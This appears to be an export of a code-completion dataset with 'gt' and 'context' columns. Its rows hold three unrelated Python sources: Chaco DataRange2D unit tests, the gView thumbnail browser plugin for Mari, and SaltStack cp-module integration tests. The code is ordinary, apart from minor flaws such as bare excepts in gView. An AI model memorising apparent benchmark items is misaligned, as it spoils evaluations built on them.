gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
import unittest
from numpy import alltrue, arange, array, ravel, transpose, zeros, inf, isinf
from numpy.testing import assert_equal, assert_
from chaco.api import DataRange2D, GridDataSource, PointDataSource
class DataRange2DTestCase(unittest.TestCase):
def test_empty_range(self):
r = DataRange2D()
assert_ary_(r.low,array([-inf,-inf]))
assert_ary_(r.high,array([inf,inf]))
self.assert_(r.low_setting == ('auto','auto'))
self.assert_(r.high_setting == ('auto', 'auto'))
r.low = array([5.0,5.0])
r.high = array([10.0,10.0])
assert_ary_(r.low_setting, array([5.0,5.0]))
assert_ary_(r.high_setting, array([10.0,10.0]))
assert_ary_(r.low,array([5.0,5.0]))
assert_ary_(r.high, array([10.0,10.0]))
return
def test_single_source(self):
r = DataRange2D()
x = arange(10.)
y = arange(0.,100.,10.)
ds = PointDataSource(transpose(array([x,y])), sort_order="none")
r.add(ds)
assert_ary_(r.low, array([0.,0.]))
assert_ary_(r.high, array([9.0,90.0]))
r.low = [3.0,30.0]
r.high = [6.0,60.0]
assert_ary_(r.low_setting, array([3.0,30.0]))
assert_ary_(r.high_setting, array([6.0,60.0]))
assert_ary_(r.low, array([3.0,30.0]))
assert_ary_(r.high, array([6.0,60.0]))
r.refresh()
assert_ary_(r.low_setting, array([3.0,30.0]))
assert_ary_(r.high_setting, array([6.0,60.0]))
assert_ary_(r.low, array([3.0,30.0]))
assert_ary_(r.high, array([6.0,60.0]))
r.low = ('auto', 'auto')
self.assert_(r.low_setting == ('auto', 'auto'))
assert_ary_(r.low, array([0.0,0.0]))
return
def test_constant_values(self):
r = DataRange2D()
ds = PointDataSource(array([[5.0,5.0]]), sort_order="none")
r.add(ds)
# A constant value > 1.0, by default, gets a range that brackets
# it to the nearest power of ten above and below
assert_ary_(r.low, array([1.0,1.0]))
assert_ary_(r.high, array([10.0,10.0]))
r.remove(ds)
ds = PointDataSource(array([[31.4,9.7]]))
r.add(ds)
assert_ary_(r.low, array([10.0,1.0]))
assert_ary_(r.high, array([100.0,10.0]))
r.remove(ds)
ds = PointDataSource(array([[0.125,0.125]]))
r.add(ds)
assert_ary_(r.low, array([0.0, 0.0]))
assert_ary_(r.high, array([0.25, 0.25]))
r.remove(ds)
ds = PointDataSource(array([[-0.125, -0.125]]))
r.add(ds)
assert_ary_(r.low, array([-0.25, -0.25]))
assert_ary_(r.high, array([0.0, 0.0]))
return
def test_multi_source(self):
x = arange(10.)
y = arange(0.,100.,10.)
foo = transpose(array([x,y]))
bar = transpose(array([y,x]))
ds1 = PointDataSource(foo)
ds2 = PointDataSource(bar)
r = DataRange2D(ds1, ds2)
assert_ary_(r.low, [0.0,0.0])
assert_ary_(r.high, [90.,90.])
return
def test_grid_source(self):
test_xd1 = array([1,2,3])
test_yd1 = array([1.5, 0.5, -0.5, -1.5])
test_sort_order1 = ('ascending', 'descending')
test_xd2 = array([0,50,100])
test_yd2 = array([0.5, 0.75, 1])
ds1 = GridDataSource(xdata=test_xd1, ydata=test_yd1,
sort_order=test_sort_order1)
ds2 = GridDataSource(xdata=test_xd2, ydata=test_yd2)
r = DataRange2D()
r.add(ds1)
assert_ary_(r.low, array([1,-1.5]))
assert_ary_(r.high, array([3,1.5]))
r.add(ds2)
assert_ary_(r.low, array([0.0,-1.5]))
assert_ary_(r.high, array([100,1.5]))
r.remove(ds1)
assert_ary_(r.low, array([0,0.5]))
assert_ary_(r.high, array([100,1]))
r.remove(ds2)
assert_ary_(r.low, array([-inf,-inf]))
assert_ary_(r.high, array([inf,inf]))
def test_set_bounds(self):
test_xd = array([-10,10])
test_yd = array([-10,10])
ds = GridDataSource(xdata=test_xd, ydata=test_yd)
r = DataRange2D()
r.set_bounds((-1,-2), (3,4))
assert_ary_(r.low, array([-1,-2]))
assert_ary_(r.high, array([3,4]))
r.add(ds)
assert_ary_(r.low, array([-1,-2]))
r.low_setting = ('auto','auto')
assert_ary_(r.low, array([-10,-10]))
assert_ary_(r.high, array([3,4]))
r.high_setting = ('auto','auto')
assert_ary_(r.low, array([-10,-10]))
assert_ary_(r.high, array([10,10]))
r.set_bounds((-100,-100), (100,100))
assert_ary_(r.low, array([-100,-100]))
assert_ary_(r.high, array([100,100]))
def test_reset_bounds(self):
r = DataRange2D()
low = (13, 42)
high = (1337, 9001)
r.set_bounds(low, high)
self.assertEqual(r.low_setting, low)
self.assertEqual(r.high_setting, high)
r.reset()
self.assertEqual(r.low_setting, ('auto', 'auto'))
self.assertEqual(r.high_setting, ('auto', 'auto'))
self.assertEqual(r.x_range.low_setting, 'auto')
self.assertEqual(r.y_range.low_setting, 'auto')
self.assertEqual(r.x_range.high_setting, 'auto')
self.assertEqual(r.y_range.high_setting, 'auto')
def test_clip_data(self):
r = DataRange2D(low=[2.0,5.0], high=[10.0,8.0])
x= arange(10.0)
y= arange(0.,20.,2.)
ary= transpose(array([x,y]))
assert_equal(r.clip_data(ary) , array([[3.,6.],[4.,8.]]))
r = DataRange2D(low=[10.,10.], high=[20.,20.])
x= arange(10.0,30.,2.)
y= arange(0.,40.,4.)
ary = transpose(array([x,y]))
assert_equal(r.clip_data(ary) , array([[16.,12.],[18.,16.],[20.,20.]]))
assert_equal(r.clip_data(ary[::-1]) , array([[20,20], [18,16], [16,12]]))
return
def test_mask_data(self):
r = DataRange2D(low=[2.0,5.0], high=[10.0,18.0])
x = array([1, 3, 4, 9.8, 10.2, 12])
y = array([5, 3, 7, 12, 18, 6])
ary = transpose(array([x,y]))
assert_equal(r.mask_data(ary) , array([0,0,1,1,0,0], 'b'))
r = DataRange2D(low=[10.,15.], high=[20.,25.])
x = array([5, 10, 15, 20, 25, 30])
y = array([5, 10, 15, 20, 25, 30])
ary = transpose(array([x,y]))
target_mask = array([0,0,1,1,0,0], 'b')
assert_equal(r.mask_data(ary) , target_mask)
assert_equal(r.mask_data(ary[::-1]) , target_mask[::-1])
r = DataRange2D(low=[2.0,5.0], high=[2.5,9.0])
assert_equal(r.mask_data(ary) , zeros(len(ary)))
return
def assert_close_(desired,actual):
diff_allowed = 1e-5
diff = abs(ravel(actual) - ravel(desired))
for d in diff:
if not isinf(d):
assert_(alltrue(d <= diff_allowed))
return
def assert_ary_(desired, actual):
if (desired == 'auto'):
assert_equal(actual, 'auto')
for d in range(len(desired)):
assert_equal(desired[d], actual[d])
return
if __name__ == '__main__':
import nose
nose.run()
|
|
#gView 0.5.5
#View Module - gViewer.py
#---------------------------------------------------
#Description: Texture thumbnail browser for Mari
#Supported Versions: 2.6.x
#Author: Ben Neall, Contact: bneall@gmail.com
#copyright Ben Neall 2014
import PySide.QtGui as QtGui
import PySide.QtCore as QtCore
import threading
import json
import os
import uuid
import glob
import mari
###--------------------------------------------------------------------------###
### COMMON
###--------------------------------------------------------------------------###
mari_icon_path = mari.resources.path(mari.resources.ICONS)
mari_user_path = mari.resources.path(mari.resources.USER)
mari_script_path = mari.resources.path(mari.resources.USER_SCRIPTS)
###--------------------------------------------------------------------------###
### gView COMMON
###--------------------------------------------------------------------------###
gViewTempDir = '/usr/tmp'
if mari.app.version().isWindows():
gViewTempDir = 'C:\\temp'
if mari.app.version().isMac():
gViewTempDir = '/tmp'
gViewIconDir = os.path.join(mari_script_path, 'gView', 'Icons')
gViewThumbDir = 'gViewThumbs'
gViewBmarkFile = os.path.join(mari_user_path, 'gViewBookmark.prefs')
gViewConfigFile = os.path.join(mari_user_path, 'gViewConfig.prefs')
gViewItemHPad = 20
gViewItemVPad = 10
gViewItemSize = 210
gViewSizes = [200, 800]
QtGui.QPixmapCache.setCacheLimit(51200)
###--------------------------------------------------------------------------###
### LOAD CONFIG
###--------------------------------------------------------------------------###
try:
configFile = open(gViewConfigFile)
config = json.load(configFile)
gViewTempDir = config['gViewTempDir']
gViewSizes = config['gViewSizes']
except:
pass
###--------------------------------------------------------------------------###
### BOOKMARK SYSTEM
###--------------------------------------------------------------------------###
class GBookmarkItem(QtGui.QTreeWidgetItem):
def __init__(self, name):
super(GBookmarkItem, self).__init__()
self.setText(0, name)
self.setFlags(
QtCore.Qt.ItemIsEditable
| QtCore.Qt.ItemIsEnabled
| QtCore.Qt.ItemIsSelectable
| QtCore.Qt.ItemIsDropEnabled
| QtCore.Qt.ItemIsDragEnabled
)
self.setIcon(0, QtGui.QIcon('%s/Folder32x32.png' % gViewIconDir))
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.RightButton:
pass
class GBookmark(QtGui.QTreeWidget):
pathAdded = QtCore.Signal(str)
itemMoved = QtCore.Signal()
currentItems = []
pathList = []
def __init__(self):
super(GBookmark, self).__init__()
self.setMinimumWidth(100)
self.setDragDropMode(self.InternalMove)
self.installEventFilter(self)
self.setColumnCount(1)
self.setAlternatingRowColors(True)
self.setIndentation(10)
self.setHeaderHidden(True)
self.setEditTriggers(QtGui.QAbstractItemView.SelectedClicked)
self.setDragEnabled(True)
self.setSelectionMode(self.ExtendedSelection)
self.itemChanged.connect(self.sortAllItems)
self.itemMoved.connect(self.restoreExpandedState)
#Style
self.setStyleSheet("\
QTreeWidget { alternate-background-color: rgb(105, 105, 105); } \
")
#Context Menu
self.menu = QtGui.QMenu()
self.importAction = self.menu.addAction(QtGui.QIcon('%s/Palette.16x16.png' % mari_icon_path), 'New Group')
#Connections
self.importAction.triggered.connect(self.makeBlankItem)
def eventFilter(self, sender, event):
'''Detects when an item moves'''
if (event.type() == QtCore.QEvent.ChildRemoved):
self.itemMoved.emit()
if (event.type() == QtCore.QEvent.ChildAdded):
self.itemMoved.emit()
return False # don't actually interrupt anything
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Delete:
self.removeBookmark()
def contextMenuEvent(self, event):
self.menu.exec_(event.globalPos())
def removeBookmark(self):
for item in self.selectedItems():
if not item.parent():
index = self.indexOfTopLevelItem(item)
self.takeTopLevelItem(index)
else:
index = item.parent().indexOfChild(item)
item.parent().takeChild(index)
def sortAllItems(self):
self.sortItems(0, QtCore.Qt.AscendingOrder)
def buildFromPath(self, path=None, mode='multi'):
#path = self.customPath.text()
pathList = []
itemList = []
#Top Directory
rootName = os.path.basename(path)
rootPath = path
rootItem = GBookmarkItem(rootName)
rootItem.setData(0, 32, [None, rootName, rootPath])
itemList.append(rootItem)
self.addTopLevelItem(rootItem)
if mode is 'multi':
self.pathAdded.emit(rootPath)
#Sub Directories
for root, dirs, files in os.walk(path):
for name in dirs:
if not name.startswith('.'):
parent = root
fullpath = os.path.join(root, name)
bookmarkData = [parent, name, fullpath]
parentItem = self.findParentItem(parent)
if parentItem:
newItem = GBookmarkItem(name)
newItem.setData(0, 32, bookmarkData)
parentItem.insertChild(0, newItem)
itemList.append(newItem)
self.pathAdded.emit(fullpath)
#Build IDs
self.setItemUUID(itemList)
self.setParentUUID()
#Sort and Expand
self.sortAllItems()
def makeBlankItem(self):
inputText, ok = QtGui.QInputDialog.getText(self, 'Create New Group', 'Enter name:')
if ok:
#Keep Hierarchy
for item in self.selectedItems():
if item.childCount() >= 1:
for index in range(item.childCount()):
childItem = item.child(index)
childItem.setSelected(False)
#"Blank" Item
name = str(inputText)
UUID = uuid.uuid4().hex
bookmarkData = [None, name, UUID, None, True]
blankItem = GBookmarkItem(name)
blankItem.setData(0, 32, bookmarkData)
blankItem.setIcon(0, QtGui.QIcon('%s/Folder32x32.png' % gViewIconDir))
self.addTopLevelItem(blankItem)
#Group Items
for item in self.selectedItems():
if item.parent():
item.parent().removeChild(item)
else:
self.invisibleRootItem().removeChild(item)
blankItem.insertChild(0, item)
def findParentItem(self, itemParent):
it = QtGui.QTreeWidgetItemIterator(self)
while it.value():
item = it.value()
itemData = item.data(0, 32)
if itemData[2] == itemParent:
return item
it += 1
def setItemUUID(self, itemList):
for item in itemList:
name = item.text(0)
parentUUID = None
UUID = uuid.uuid4().hex
fullPath = item.data(0, 32)[2]
item.setData(0, 32, [parentUUID, name, UUID, fullPath, None])
item.setExpanded(True)
def setParentUUID(self):
it = QtGui.QTreeWidgetItemIterator(self)
while it.value():
item = it.value()
name = item.text(0)
UUID = item.data(0, 32)[2]
fullPath = item.data(0, 32)[3]
expandState = item.isExpanded()
try:
parentItem = item.parent()
parentUUID = parentItem.data(0, 32)[2]
except:
parentUUID = None
item.setData(0, 32, [parentUUID, name, UUID, fullPath, expandState])
it += 1
def restoreExpandedState(self):
it = QtGui.QTreeWidgetItemIterator(self)
while it.value():
item = it.value()
expandState = item.data(0, 32)[4]
item.setExpanded(expandState)
it += 1
def buildTreeItems(self):
json_data = open(gViewBmarkFile)
data = json.load(json_data)
for item in data:
parentUUID = item[0]
name = item[1]
UUID = item[2]
fullPath = item[3]
expandState = item[4]
bookmarkData = [parentUUID, name, UUID, fullPath, expandState]
parentItem = self.findParentItem(parentUUID)
if parentItem:
newItem = GBookmarkItem(name)
newItem.setData(0, 32, bookmarkData)
parentItem.insertChild(0, newItem)
newItem.setExpanded(expandState)
else:
rootItem = GBookmarkItem(name)
rootItem.setData(0, 32, bookmarkData)
self.addTopLevelItem(rootItem)
rootItem.setExpanded(expandState)
if fullPath:
self.pathAdded.emit(fullPath)
#Sort
self.sortAllItems()
def saveBookmarkFile(self):
self.setParentUUID()
dataList = []
it = QtGui.QTreeWidgetItemIterator(self)
while it.value():
item = it.value()
itemData = item.data(0, 32)
dataList.append(itemData)
it += 1
with open(gViewBmarkFile, 'w') as outfile:
json.dump(dataList, outfile)
###--------------------------------------------------------------------------###
### GVIEW
###--------------------------------------------------------------------------###
class GThumbGen(QtCore.QThread):
'''This class generates thumbnails to disc'''
thumbGen = QtCore.Signal()
finishGen = QtCore.Signal()
def __init__(self, files=None):
super(GThumbGen, self).__init__()
self.files = files
def generateThumb(self, source, thumb):
sourceImage = QtGui.QImage(source)
thumbImage = sourceImage.scaled(200,200, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)
thumbImage.save(thumb, 'png', 75)
self.thumbGen.emit()
def run(self):
for thumb, source in self.files.items():
sourceDate = os.path.getmtime(source)
if os.path.isfile(thumb):
thumbDate = os.path.getmtime(thumb)
if sourceDate > thumbDate:
self.generateThumb(source, thumb)
else:
self.thumbGen.emit()
else:
self.generateThumb(source, thumb)
self.finishGen.emit()
class GScene(QtGui.QGraphicsScene):
def __init__(self):
super(GScene, self).__init__()
#Background Color
self.setBackgroundBrush(QtGui.QBrush(QtGui.QColor(95, 95, 95)))
#Context Menu
self.menu = QtGui.QMenu()
self.importAction = self.menu.addAction(QtGui.QIcon('%s/ImportFile.png' % mari_icon_path), 'Import Selected')
self.copyAction = self.menu.addAction(QtGui.QIcon('%s/Copy.16x16.png' % mari_icon_path), 'Copy to Clipboard')
def contextMenuEvent(self, event):
self.menu.exec_(event.screenPos())
class GRectItem(QtGui.QGraphicsRectItem):
def __init__(self, image_path, source):
super(GRectItem, self).__init__()
#Attributes
self.setFlags(self.flags() | QtGui.QGraphicsItem.ItemIsSelectable)
#Rect Settings
self.setRect(0, 0, gViewItemSize, gViewItemSize)
self.rectBrush = QtGui.QBrush(QtGui.QColor(100, 100, 100))
self.rectPenBrush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
self.rectPen = QtGui.QPen(self.rectPenBrush, 1)
self.setBrush(self.rectBrush)
self.setPen(self.rectPen)
#Pad Rect Settings
self.setRect(0, 0, gViewItemSize, gViewItemSize)
padRect = QtGui.QGraphicsRectItem()
padRect.setPen(QtGui.QPen(self.rectPenBrush, 20))
padRect.setParentItem(self)
#Thumb Title Item
thumbTitle = os.path.basename(source)
if len(thumbTitle) >= 36:
thumbTitle = thumbTitle[:34]+'...'
self.setData(32, source)
#Title Size Check
self.thumbTitleItem = QtGui.QGraphicsSimpleTextItem(thumbTitle)
self.thumbTitleItem.setBrush(QtGui.QBrush(QtGui.QColor(200, 200, 200)))
self.thumbTitleItem.setPos(0, gViewItemSize)
self.thumbTitleItem.setParentItem(self)
#Thumb Image Item
thumbImage = QtGui.QPixmap()
#Cache thumbnail
if not QtGui.QPixmapCache.find(image_path, thumbImage):
thumbImage.load(image_path)
QtGui.QPixmapCache.insert(image_path, thumbImage)
else:
QtGui.QPixmapCache.find(image_path, thumbImage)
#Configure items with alphas
if thumbImage.hasAlpha():
backgroundImage = QtGui.QImage('%s/GrayChecker.png' % gViewIconDir)
bgBrush = QtGui.QBrush(backgroundImage)
self.setBrush(bgBrush)
thumbImgItem = QtGui.QGraphicsPixmapItem(thumbImage)
thumbWidth = thumbImgItem.pixmap().width()
thumbHeight = thumbImgItem.pixmap().height()
thumbHOffset = (gViewItemSize-thumbWidth)/2
thumbVOffset = (gViewItemSize-thumbHeight)/2
thumbImgItem.setPos(thumbHOffset, thumbVOffset)
thumbImgItem.setParentItem(self)
def itemChange(self, change, value):
if change == QtGui.QGraphicsItem.ItemSelectedChange:
if value == True:
self.setHighlite()
if value == False:
self.removeHighlite()
return QtGui.QGraphicsItem.itemChange(self, change, value)
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.RightButton:
pass
def setHighlite(self):
highlitePenBrush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
highlitePen = QtGui.QPen(highlitePenBrush, 3)
self.setPen(highlitePen)
def removeHighlite(self):
self.setPen(self.rectPen)
class GView(QtGui.QWidget):
path = None
maxColumns = 6
vSceneSize = 0
hSceneSize = 0
items = 0
def __init__(self):
super(GView, self).__init__()
mainLayout = QtGui.QVBoxLayout()
self.viewSplitter = QtGui.QSplitter()
toolLayout = QtGui.QHBoxLayout()
progLayout = QtGui.QHBoxLayout()
self.setLayout(mainLayout)
self.gbook = GBookmark()
self.gviewer = QtGui.QGraphicsView()
self.gscene = GScene()
self.gviewer.setInteractive(True)
self.gviewer.setScene(self.gscene)
self.gviewer.setAlignment( QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft )
self.gviewer.resize(mari.app.canvasWidth() * 0.8, mari.app.canvasHeight())
self.gbook.resize(mari.app.canvasWidth() * 0.2, mari.app.canvasHeight())
self.pathLine = QtGui.QLineEdit()
self.pathLabel = QtGui.QLabel('Path:')
self.searchLine = QtGui.QLineEdit()
self.searchLine.setMaximumWidth(200)
self.searchLabel = QtGui.QLabel('Filter:')
self.columnSpin = QtGui.QSpinBox()
self.progBar1 = QtGui.QProgressBar()
self.progLabel = QtGui.QLabel('Generating Thumbnails...')
self.progStatus = QtGui.QLabel()
self.progBar1.setHidden(True)
self.progLabel.setHidden(True)
self.progStatus.setHidden(True)
self.browseBtn = QtGui.QPushButton('Browse')
self.prefsBtn = QtGui.QToolButton()
self.prefsBtn.setIcon(QtGui.QIcon('%s/ToolProperties.png' % mari_icon_path))
self.prefsBtn.setToolTip('Set Thumbnail location')
self.wizardBtn = QtGui.QToolButton()
self.wizardBtn.setIcon(QtGui.QIcon('%s/MagicWand.png' % gViewIconDir))
self.wizardBtn.setToolTip('Crawl Directories')
self.addBookmarkBtn = QtGui.QToolButton()
self.addBookmarkBtn.setIcon(QtGui.QIcon('%s/Star16x16.png' % gViewIconDir))
self.addBookmarkBtn.setToolTip('Add bookmark for current path')
self.loadBtn = QtGui.QToolButton()
self.loadBtn.setIcon(QtGui.QIcon('%s/ReloadShaders.png' % mari_icon_path))
self.loadBtn.setToolTip('Load path into viewer')
self.fitBtn = QtGui.QToolButton()
self.fitBtn.setIcon(QtGui.QIcon('%s/ABSSize.png' % mari_icon_path))
self.fitBtn.setToolTip('Fit column width to view')
self.statusBarLabel = QtGui.QLabel('Resolution: Format: Size: Name: ')
self.statusBarLabel.setHidden(True)
toolLayout.addWidget(self.prefsBtn)
toolLayout.addWidget(self.wizardBtn)
toolLayout.addWidget(self.searchLabel)
toolLayout.addWidget(self.searchLine)
toolLayout.addWidget(self.pathLabel)
toolLayout.addWidget(self.pathLine)
toolLayout.addWidget(self.browseBtn)
toolLayout.addWidget(self.addBookmarkBtn)
toolLayout.addWidget(self.loadBtn)
self.viewSplitter.addWidget(self.gbook)
self.viewSplitter.addWidget(self.gviewer)
self.viewSplitter.setCollapsible(0, False)
self.viewSplitter.setCollapsible(1, False)
progLayout.addWidget(self.progLabel)
progLayout.addWidget(self.progBar1)
progLayout.addWidget(self.progStatus)
progLayout.addWidget(self.statusBarLabel)
progLayout.addStretch()
progLayout.addWidget(self.columnSpin)
progLayout.addWidget(self.fitBtn)
mainLayout.addLayout(toolLayout)
mainLayout.addWidget(self.viewSplitter)
mainLayout.addLayout(progLayout)
self.browseBtn.clicked.connect(self.browseCustomPath)
self.loadBtn.clicked.connect(self.loadFromCustomPath)
self.addBookmarkBtn.clicked.connect(self.setBookmark)
self.fitBtn.clicked.connect(self.fitColumnsToCanvas)
self.searchLine.textChanged.connect(self.sortItems)
self.columnSpin.valueChanged.connect(self.setColumns)
self.gscene.importAction.triggered.connect(self.importImages)
self.gscene.copyAction.triggered.connect(self.copyPathToClipboard)
self.gbook.itemSelectionChanged.connect(self.loadFromBookmark)
self.prefsBtn.clicked.connect(self.setTempDir)
self.wizardBtn.clicked.connect(self.setWizardBookmark)
self.gbook.pathAdded.connect(self.crawlWizard)
self.viewSplitter.splitterMoved.connect(self.fitColumnsToCanvas)
self.gscene.selectionChanged.connect(self.updateStatusLabel)
mari.utils.connect(mari.app.exiting, self.writePrefs)
#Load bookmark Preferences
try:
self.gbook.buildTreeItems()
except:
print "gView Message: No prefs file found"
self.viewSplitter.setSizes(gViewSizes)
def updateStatusLabel(self):
selectedItem = self.gscene.selectedItems()
if selectedItem and len(selectedItem) == 1:
source = selectedItem[0].data(32)
reader = QtGui.QImageReader(source)
name = os.path.basename(source)
res = '%dx%d' % (reader.size().width(), reader.size().height())
size = QtCore.QFileInfo(source).size() / 1024
statusString = 'Name: %s Resolution: %s Size: %s KB' % (name, res, size)
self.statusBarLabel.setText(statusString)
self.statusBarLabel.setHidden(False)
else:
self.statusBarLabel.setHidden(True)
def getThumbnailPath(self, path):
self.thumbnailPath = '%s/%s%s' % (gViewTempDir, gViewThumbDir, path)
if mari.app.version().isWindows():
cleanPath = path.replace(':','')
self.thumbnailPath = os.path.join(gViewTempDir, gViewThumbDir, cleanPath)
def buildPathDict(self, path):
self.getThumbnailPath(path)
supportedFormats = QtGui.QImageWriter.supportedImageFormats()
self.fileDict = {}
dirList = os.listdir(path)
for file in dirList:
filePath = os.path.join(path, file)
if os.path.isfile(filePath):
#Build thumbnail directories
if not os.path.exists(self.thumbnailPath):
os.makedirs(self.thumbnailPath)
#File paths
thumbFile = '%s.%s' % (os.path.splitext(file)[0], 'png')
thumbFile = os.path.join(self.thumbnailPath, thumbFile)
#Format check:
fileExtension = file.split(".")[-1]
if fileExtension.lower() in supportedFormats:
#Build file dict
self.fileDict[thumbFile]=filePath
def setBookmark(self):
if not self.pathLine.text():
return
self.path = self.pathLine.text()
self.gbook.buildFromPath(path=self.path, mode='single')
def setWizardBookmark(self):
path = QtGui.QFileDialog.getExistingDirectory(self, caption="Choose Texture Folder", options=QtGui.QFileDialog.ShowDirsOnly)
if path:
self.gbook.buildFromPath(path, mode='multi')
def loadFromBookmark(self):
selectedItems = self.gbook.selectedItems()
if len(selectedItems) > 1 or len(selectedItems) == 0:
return
self.path = selectedItems[0].data(0, 32)[3]
self.pathLine.setText(self.path)
if self.path:
self.buildThumbnails()
def loadFromCustomPath(self):
self.path = self.pathLine.text()
self.buildThumbnails()
def buildThumbnails(self):
self.buildPathDict(self.path)
self.imageCount = len(self.fileDict)
self.initProgBar()
thumbnailThread = GThumbGen(self.fileDict)
thumbnailThread.thumbGen.connect(self.thumbGenProgress)
thumbnailThread.finishGen.connect(self.populateSceneTHREAD)
thumbnailThread.run()
def initProgBar(self):
self.progBar1.setMaximum(self.imageCount)
self.progBar1.setHidden(False)
self.progLabel.setHidden(False)
self.progStatus.setHidden(False)
def thumbGenProgress(self):
currentValue = self.progBar1.value()
self.progBar1.setValue(currentValue+1)
self.progStatus.setText('%s: %s/%s' % (os.path.basename(self.path), currentValue, self.imageCount))
QtCore.QCoreApplication.processEvents()
def populateSceneTHREAD(self):
newThread = threading.Thread(target=self.populateScene())
newThread.run()
def populateScene(self):
self.gscene.clear()
self.setCursor(QtCore.Qt.BusyCursor)
sortedFiles = sorted(self.fileDict.iteritems())
for item in sortedFiles:
thumb = item[0]
source= item[1]
bgRectItem = GRectItem(thumb, source)
self.gscene.addItem(bgRectItem)
self.items += 1
self.setPositions(bgRectItem)
self.progBar1.setHidden(True)
self.progLabel.setHidden(True)
self.progStatus.setHidden(True)
self.unsetCursor()
self.fitColumnsToCanvas()
def setPositions(self, item):
item.setPos(self.hSceneSize, self.vSceneSize)
if self.items % self.maxColumns:
self.hSceneSize += gViewItemSize+gViewItemVPad
else:
self.vSceneSize += gViewItemSize+gViewItemHPad
self.hSceneSize = 0
def setColumns(self):
self.maxColumns = self.columnSpin.value()
self.sortItems()
def fitColumnsToCanvas(self):
gbook_length = self.gbook.size().width()
available_area = mari.app.canvasWidth() - gbook_length
self.maxColumns = int(round(available_area / (gViewItemSize + gViewItemHPad)))
self.columnSpin.setValue(self.maxColumns)
self.sortItems()
def sortItems(self):
#Reset
self.items = 0
self.hSceneSize = 0
self.vSceneSize = 0
#List of Parent Items
groupItems = []
for item in self.gscene.items():
if item.childItems():
groupItems.append(item)
item.setVisible(False)
item.setPos(0,0)
#Reverse Group List
groupItems = groupItems[::-1]
#Display Only Items Matching Search
for item in groupItems:
searchText = self.searchLine.text()
titleItem = item.childItems()[1]
thumbName = titleItem.text().split(".")[0]
if searchText.lower() in thumbName.lower():
item.setVisible(True)
self.items += 1
self.setPositions(item)
#Resize Scene
autoRect = self.gscene.itemsBoundingRect()
self.gscene.setSceneRect(autoRect)
##Scroll to top
self.gviewer.ensureVisible(0.0,0.0,0.0,0.0)
#Refresh UI
self.gscene.update()
QtCore.QCoreApplication.processEvents()
def setTempDir(self):
global gViewTempDir
directory = QtGui.QFileDialog.getExistingDirectory(self, caption="Choose Thumbnail Folder", dir=gViewTempDir, options=QtGui.QFileDialog.ShowDirsOnly)
if directory:
gViewTempDir = directory
def browseCustomPath(self):
directory = QtGui.QFileDialog.getExistingDirectory(self, caption="Choose Texture Folder", dir=self.path, options=QtGui.QFileDialog.ShowDirsOnly)
if directory:
self.pathLine.setText(directory)
self.path = directory
self.buildThumbnails()
def writePrefs(self):
configDict = {}
configDict['gViewTempDir'] = gViewTempDir
configDict['gViewSizes'] = self.viewSplitter.sizes()
with open(gViewConfigFile, 'w') as outfile:
json.dump(configDict, outfile)
self.gbook.saveBookmarkFile()
def importImages(self):
selectedItems = self.gscene.selectedItems()
for item in selectedItems:
imagePath = item.data(32)
print "Image Imported: ", imagePath
mari.images.load(imagePath)
def copyPathToClipboard(self):
selectedItem = self.gscene.selectedItems()[-1]
imagePath = selectedItem.data(32)
QtGui.QClipboard().setText(imagePath, QtGui.QClipboard.Clipboard)
def crawlWizard(self, path):
self.path = path
self.gbook.setDisabled(True)
self.imageCount = 0
#Find directories
for root, dirs, files in os.walk(path, topdown=True):
self.imageCount += len(files)
#Make Thumbnails:
self.buildPathDict(self.path)
self.initProgBar()
thumbnailThread = GThumbGen(self.fileDict)
thumbnailThread.thumbGen.connect(self.thumbGenProgress)
thumbnailThread.run()
self.progBar1.setHidden(True)
self.progLabel.setHidden(True)
self.progStatus.setHidden(True)
self.gbook.setDisabled(False)
|
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import hashlib
import tempfile
# Import Salt Testing libs
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../../')
# Import salt libs
import integration
import salt.utils
class CPModuleTest(integration.ModuleCase):
'''
Validate the cp module
'''
def test_get_file(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'scene33')
self.run_function(
'cp.get_file',
[
'salt://grail/scene33',
tgt,
])
with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
def test_get_file_templated_paths(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'cheese')
self.run_function(
'cp.get_file',
[
'salt://{{grains.test_grain}}',
tgt.replace('cheese', '{{grains.test_grain}}')
],
template='jinja'
)
with salt.utils.fopen(tgt, 'r') as cheese:
data = cheese.read()
self.assertIn('Gromit', data)
self.assertNotIn('bacon', data)
def test_get_file_gzipped(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'file.big')
src = os.path.join(integration.FILES, 'file/base/file.big')
with salt.utils.fopen(src, 'r') as fp_:
hash = hashlib.md5(fp_.read()).hexdigest()
self.run_function(
'cp.get_file',
[
'salt://file.big',
tgt,
],
gzip=5
)
with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
self.assertEqual(hash, hashlib.md5(data).hexdigest())
def test_get_file_makedirs(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'make/dirs/scene33')
self.run_function(
'cp.get_file',
[
'salt://grail/scene33',
tgt,
],
makedirs=True
)
with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
def test_get_template(self):
'''
cp.get_template
'''
tgt = os.path.join(integration.TMP, 'scene33')
self.run_function(
'cp.get_template',
[
'salt://grail/scene33',
tgt,
'spam=bacon',
])
with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('bacon', data)
self.assertNotIn('spam', data)
def test_get_dir(self):
'''
cp.get_dir
'''
tgt = os.path.join(integration.TMP, 'many')
self.run_function(
'cp.get_dir',
[
'salt://grail',
tgt
])
self.assertIn('grail', os.listdir(tgt))
self.assertIn('36', os.listdir(os.path.join(tgt, 'grail')))
